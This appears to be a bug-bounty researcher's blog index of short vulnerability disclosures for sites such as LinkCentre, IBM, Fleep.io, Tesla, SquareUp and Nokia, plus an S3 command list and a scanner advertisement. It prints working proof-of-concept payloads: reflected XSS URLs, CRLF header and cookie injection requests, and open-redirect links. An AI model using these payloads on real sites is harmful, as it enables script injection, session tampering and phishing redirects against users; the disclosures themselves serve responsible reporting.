AWS S3 Bucket Command References

# List all buckets

aws s3 ls

# List content of a bucket

aws s3 ls s3://<bucket>

# Create a bucket

aws s3 mb s3://<bucket>

# Copy into bucket

aws s3 cp <path> s3://<bucket>

# Copy from bucket

aws s3 cp s3://<bucket> <path>

# Remove empty bucket

aws s3 rb s3://<bucket>

# Remove object from bucket

aws s3 rm s3://<bucket>/<path>

Read More

LinkCentre | Cross Site Scripting Vulnerability #2

It was another xss vulnerability in linkcentre. There's a little trick here to trigger xss. Hope you like it. Stay Connected :) @doubt2proud

Read More

iFixit | Forgot Password Mechanism Works as a Spam Machine

1) You got to go to Forgot Password webpage.{https://www.ifixit.com/login/forgot_password} 2) You will see an input text field where you can enter an e-mail address * Now, repeat the above 2 steps and you can keep sending e-mails to the same address again and again. You need to do is just simply Click Reset My password many times. "Attacker would automate HTTP requests and keep sending the e-mails" repeatedly. This could result in spamming where attacker enters the target e-mail address which might belong to anyone and keeps them sending bulk e-mails which makes the customer look at it as, spamming which is pathetic.

Read More

Linkcentre | Reflected Cross Site Scripting Vulnerability

1. Simply copy and paste the below URL in Google Chrome, Mozilla Firefox and IE.
https://www.linkcentre.com/search/?q=%27;prompt(document.domain);///

2. It will give you a popup which reflected on "q" parameter.  
Bypassing Technique: \';alert(1);///

Read More

Tracing: Trace any email to know actual sender

*** How to Trace Emails Back to their Source IP Address ***
To trace the IP address of the original email sender, head to the first Received in the full email header. Alongside the first Received line is the IP address of the server that sent the email. Sometimes, this appears as X-Originating-IP or Original-IP.  Find the IP address, then head to some IP Lookup online and paste the IP address to get the sender information.


@doubt2proud

Read More

Paypal | Open Url Redirection Vulnerability (paypal-biz.com)

An URL Redirection, also known as Open Redirection. It is occurs when web page is being redirected to another web page via a user controllable input.

Paypal-biz.com was vulnerable for this vulnerability. This was reported responsibly and is now accepting URLs only which are located on accepted domains.

 @doubt2proud

Read More

Pinterest | Unvalidated Url Redirection

Pinterest website instapaper.com was vulnerable for Url Redirection. The steps followed are:
1- Visit: https://www.instapaper.com/user/login...
2- Login to the account.
3- The page instead of logging-in will be redirected to evilsite.com

@doubt2proud

Read More

ClubCollect | Url Redirection

1. Visit https://www.clubcollect.com/#home-form
2. Fill the Form by entering Name, email and captcha.
3. Turn your Interceptor ON and click on Send button, capture the request by Interceptor.
4. Change the default 'return_to' parameter value to directed domain.

@dout2proud

Read More

Walmart | Cross Site Scripting Vulnerability

Vulnerable Url: https://homeservices.walmart.com/blog/ It was observed that www.homeservices.walmart.com/blog/ page was vulnerable to XSS.

 

Read More

Shark-Watch | Cross Site Scripting Vulnerability

URI-BASED of the page https://www.shark-watch.com/en was vulnerable. The bug was reported responsibly. @doubt2proud

Read More

CRLF Injection in Fleep.io

ASSALAM O ALAIKUM !

After so long period, writing a Short Disclosure of the recent vulnerability that I have found in Fleep.io. It has been fixed now. So, I can share it.

What is CR & LF?
Carriage return is from the days of the typewriters, abbreviated as CR which would return to the next line and push the paper up. Line feed (LF) signals the end of the line. Together, this sequence can be referred to as CRLF.

What is CRLF Injection?

When Web application do not properly sanitize user input before using it as an HTTP header value then there should be maximum probability of the existence of Vulnerability CRLF Injection (also called Response Splitting and Header Injection). It allows an attacker to control the remaining headers and body of the response the application and also allow them to create additional responses.


Proof  Of Concept:

Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69
GET /v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69 HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 08:49:12 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
HeaderInjected: injected_by_Ali_Hassan_Ghori/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 08:49:12 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny

So, here I injected cookie.

Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C

GET /v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C HTTP/1.1

Host: fleep.io

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Wed, 20 Jan 2016 09:10:17 GMT

Content-Type: text/html

Content-Length: 178

Location: https://fleep.io/v/ed1202c85b/assets/fleep/

Set-Cookie: injectedCookie=securitywall/

Connection: keep-alive

Expires: Fri, 22 Jan 2016 09:10:17 GMT

Cache-Control: max-age=172800

content-security-policy: default-src 'none'

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

x-content-type-options: nosniff

X-XSS-Protection: 1; mode=block

X-Frame-Options: deny

Read More

TeslaMotor Cross Site Scripting Vulnerability

I found some XSS issue in suppliers.teslamotors.com domain.


Steps To Reproduce:
Note: For Intercepting the Request. I used Firefox Add-on Tamper Data.

1-  Visit: https://suppliers.teslamotors.com/supplier/

2- ​Type username and password in the given fields.

3- Before Click on Login Button, Run TAMPER DATA and start to Tamper.

4- Back to Page, Click on check box "Remember me"

5- Click on Login button. Your request is now tampered by tamper data. replace parameter 'remember-me' value "1" with your {XSS payload}.

6- Click on "OK" Button.

7- XSS Pop Up !!!


Snap Shot:

Video PoC:

Read More

SquareUp Open Redirection

During Password resetting, I observe something, that Password token link is redirected first through subscriptions link. where 'r' is the parameter and value can be any website.

Steps To Reproduce:

1- After Password Reset email, Copy Link Address.

2- Address URI look like this: 

https://squareup.com/subscriptions/r?d=VHZ0CwTM5CMAwfX4&e=/html/body/table/tr/td/table[1]/tr[2]/td/table/tr[2]/td/table/tr[2]/td[2]/table/tr[5]/td/div/a&n=emailClick&r=https://squareup.com/password/reset/Token

3- https://squareup.com/subscriptions/r?r=http://alihassanpenetrationtester.blogspot.com/

https://squareup.com/subscriptions/r?r=http://www.google.com/

Video PoC: 

Read More

Remote Presentation Auth_key Issue In Prezi

Remote Presentation Auth_key Problem

Let me explain this issue with the following example.

Suppose:

abc is the presentation _ (1)

123 is second presentation. _ (2)

I start remote Presentation of abc. with constant parameter of all presentations ?follow=r_rk7caxdncs , and Auth_key ngwd219. Now I found someone Auth_key, Even every active Auth_key can start Remote Presentation of every work.

The Impact is so clear from the example. I can use Auth_key of abc with 123 presentation or vice versa. or any Active Auth_key can start the presentation.

One more issue is constant follow parameter in every post.

Gist: https://gist.github.com/zsellera/4fe26ee7c546a4d136f4

Read More

October is National Cyber Security Awareness Month (NCSAM)

Hi Everybody,

As you all know that October is National Cyber Security Month, and SingleHop is dedicated this to helping spread the word about how people protect themselves from different attacks.

First of all, Password is the most important thing that you should have to protect your data, information and yourself. It is said that

"Don't make a password in which your Secret is exist, Make a Unique and Strong password and Safe your all secrets behind it"

If you have a strong and unique password, now you should be take care of the following things:

• Don't share your password with anyone.
• Don't enter your password on an untrusted computer.
• Don't enter same password on every application.
• Change your password Occasionally.

In the recent year of 2014, nearly 5 million gmail accounts and passwords leaked by Russian Hacker. Hacker was claimed that around 60% of the passwords are still valid, although some users change the password.
 According to the researchers, this is nothing but just a rumor. The Hacked accounts compiled from different sources like Vulnerable applications, though Phishing Attacks etc.

What is Phishing Attacks?
Phishing is an Fraud method in which attacker make a well known design of the particular site and coded a Payload on backend. When user enter their information on it. It sends to the Attacker and Victim redirect to the original site.

One more important feature has already introduced, Two-Factor Verification Process. It was first introduced by Google.

What is Two-Factor Verification Process?

Two-factor Verification is a process to strengthen authentication is require a second factor after the username/password stage.


How Two-Factor Authentication Method Works?
The first step is to Login In with your username/email and password.
The enabled Two-Factor Authentication requires a Mobile Phone, which on every login attempt requires a unique code that will send via SMS to the given number.

SingleHop also using this feature to safe User data, they take care of it more seriously.

In 2012, three servers of Godaddy failed to resolve a result of the hack. Millions of Godaddy hosted websites went down for more than 5 hours. So, using a Secure, Relaible and Branded Server is also important to safe internet.

Mostly, Servers hacked due to Old Infra, Not updated, Vulnerable codes, Misconfigurations, Poor Scripting, Vulnerability thirdparty if application and its a Developer rights to demand particular official Company like SingleHop to take more responsibility for securing their data. SingleHop took step against these hacks and embeds security features and made a secure dedicated servers for developers. SingleHop added Server's own Application, Differents Account Levels, Monitoring System, Antivirus Protection, Application patching and Firewalls to ensure that company's data is always safe and protected.

Read More

X-Scanner By The WMA team

X-Scanner is a point'n'shoot web scanner used for fast preliminary tests prior to serious penetration testing. 
This tool works on Windows/.NET platform and on Linux/Mono.

Key Features:
[+] 1. Get Server Info
[+] 2. Check For HttpOnly Flag
[+] 3. Check For XFrame-Options
[+] 4. Check For X-XSS-Protection
[+] 5. Check For X-Content-Type options
[+] 6. Check For SSL/TLS Security
[+] 7. Check For Content Secret Policey
[+] 8. Check For Access Control flaws
[+] 9. Check For X-Download Options
[+] 10. Check For Cache Control Options
[+] 11. Blazing fast TCP Port Scanner and OS Fingerprinting.
[+] 12. One of the fastest WhoIs queries in the market.
Provided here is an example report of the tool.
http://pastebin.com/uu1GcLai
As you *might* have seen, the scan finished in just 10s.
Price:50$
Contact to alihasanghauri5@gmail.com for details and getting a copy.
FB: https://www.facebook.com/alihassanghori5

Thanks.
The WMA team.

Read More

Facebook Mark Zuckerberg Password Reset Bug - Not exploitable

I was looking for a bug in forgot password facebook.

I was send reset password link to my email account through facebook. Open the link and change my id with Mark Zukerberg's Id to 4.

Mark Zukerberg's Id

http://graph.facebook.com/4

I was thought that I have fount something. but its not I've tried this bug using my own accounts (Not Mark Zuckerberg :) and it doesn't allow me to set a new password. The "n" parameter is tied to the "u" parameter. Instead of using Mark Zuckerberg's account

Video POC:

               
Facebook Mark Zuckerberg Password Reset Bug. from Ali Hassan Ghori on Vimeo.

Read More

Symphony Fatal Database Error Disclosure - NOKIA

Here is Ali Hassan Ghori, Back after a long time.

As I have already back to my field so let me share with one of my Nokia finding. While I was finding a Bug in Nokia, I had discovered something Critical that is Symphony Fatal Database Error Disclosure in nokiaconnection.co.uk.

Steps To Reproduce:
1- Visit https://nokiaconnection.co.uk/sign-in/resend-password/ (For exploit In Mozilla Firefox Browser, install a Plugin Tamper Data or You need Burp Suite.)

2- Type single quote (') command in email field, its shows an error. right ? ( something like this 'Please enter a valid email address')

3-  Launch Tamper Data, Tamper the given page. change the email parameter value to  single quote (').

4-  Exploited !!!!
 

Symphony Fatal Database Error Disclosure - NOKIA

Video POC:

                

Symphony Fatal Database Error Disclosure - NOKIA Bug from Ali Hassan Ghori on Vimeo.

Read More

IBM Xssed

I felt Happy when I found Cross Site Scripting Vulnerability in one of the most biggest Company's Site IBM.It is my pleasure that I helped them as a White Hat Web Application Security Researcher.

About IBM

Inventions:
Computing Scale: Used to weigh and price things that any vendor can use.  This invention saved retailers a lot of money.
Universal Product Code: Even though barcodes were dreamed up and patented in the late 1940s and early 1950s, it wasn’t in use until lasers emerged years later that they could be digitally read.  This technology sped up checkouts and improved inventory-keeping.
Their inventions have helped ease the daily life of many people, such as managers, teachers, students, store owners, and many employees. IBM has many other inventions that have made our lives easier and should be greatly appreciated.

It is my Honor that I helped IBM.

btw, here is a Proof Of Concept of Cross Site Scripting Vulnerability in IBM:

 

Host:  https://www.research.ibm.com

PoC: https://www.research.ibm.com/cgi-bin/haifa/svt/public.pl?group=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E

Status: Fixed

 

Read More

Netflix - Finding Bug

Netflix has Responsible Disclosure Policy and Hall Of Fame page for those who report a valid bug to them.

For this I am searching for a bug that is Valid and may be not a Duplicate issue. ALHAMDULILLAH ! , It is my luck that the reported issue got Valid and not reported previously by other researcher.

Here is Details:

During  reconnaissance I got a domain (netflixprize.com), now I searching for a bug in it. I noticed that Password data is transmitted over HTTP. I report this issue to Netflix. They accepted it and remove the Login page because there is no more need of Login page in that domain.

Reporting Date: Jan/02/2014
Acknowledgement Date: Jan/02/2014
Issue fixed: Jan/03/2014
Listed Inside Netflix: Jan/04/2014

Read More